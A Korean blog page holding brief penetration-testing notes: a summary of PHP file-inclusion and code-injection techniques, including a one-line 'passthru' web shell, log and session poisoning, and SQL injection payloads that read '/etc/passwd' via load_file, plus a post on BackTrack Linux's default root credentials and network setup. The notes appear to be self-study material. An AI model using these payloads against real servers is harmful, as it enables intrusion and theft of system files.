2009.10.28 23:23 Web

Wowhacker 의 b0BaNa 님의 번역본 요약
기본적으로 PHP 취약점 이용
ex)require($file);

2.2 - 원격으로 명령어 실행

<? passthru($_GET[cmd]) ?>

2.2.1-아파치 로그로 PHP 코드 삽입

error.log를 이용 [ 경로 필요 ]

2.2.2-프로세스 테이블에 PHP 코드 삽입

/proc/self  마지막으로 사용된 PID 링크

2.2.3-그림으로 PHP 코드 삽입

코드는 그대로 하고 확장자만 바꿔 우회

2.2.4-세션 파일을 이용한 PHP 코드 삽입

<?php
$user=$_GET['user'];
session_register("user");
session_start();
?>

2.2.5-다른 파일들에 PHP 코드 삽입

ex) FTP 로그, webalizer ,PUT Method

2.3 쉘 획득

ex) wget , 리버스 텔넷

2.4 원격으로 파일 첨가하기

allow_url_include 허용되었다면, 직접 쉘 삽입 가능

3. 블라인드 sql injection



3.2 로컬 파일 읽어오기

union select load_file('/etc/passwd');

3.3 brute force 없이 데이터 획득

outfile "/tmp/sql.txt"
union select 1,2,3,load_file('/tmp/sql.txt');


3.4 원격으로 명령어 실행







Posted by LinkC

2009.10.28 20:29 Etc..

모의해킹에 유용한 여러가지 파일을 미리 첨부한 리눅스로 꽤 유용한듯

Down: 훅크선장님 블로그에서 받을수 있다
 
http://hook.tistory.com/

default ID : root

passwd: toor

*IP 설정

 ifconfig [인터페이스 카드] ip netmask [subnet mask] broadcast broadcast-ip route add default gw gateway-ip

ex) ifconfig eth0 192.168.69.12 netmask 255.255.255.0 broadcast 192.168.69.255 route add default gw 192.168.69.2

*network 설정

/etc/init.d/networking start/stop/restart



참고:
http://www.remote-exploit.org/backtrack.html
http://en.wikipedia.org/wiki/BackTrack


 

'Etc..' 카테고리의 다른 글

PHP Tip [ 지속 수정 ]  (0) 2009.11.06
BackTrack 설치!  (2) 2009.10.28
Posted by LinkC

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday57
Today61
Total309,989

달력

 « |  » 2018.05
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

최근에 받은 트랙백

글 보관함


. .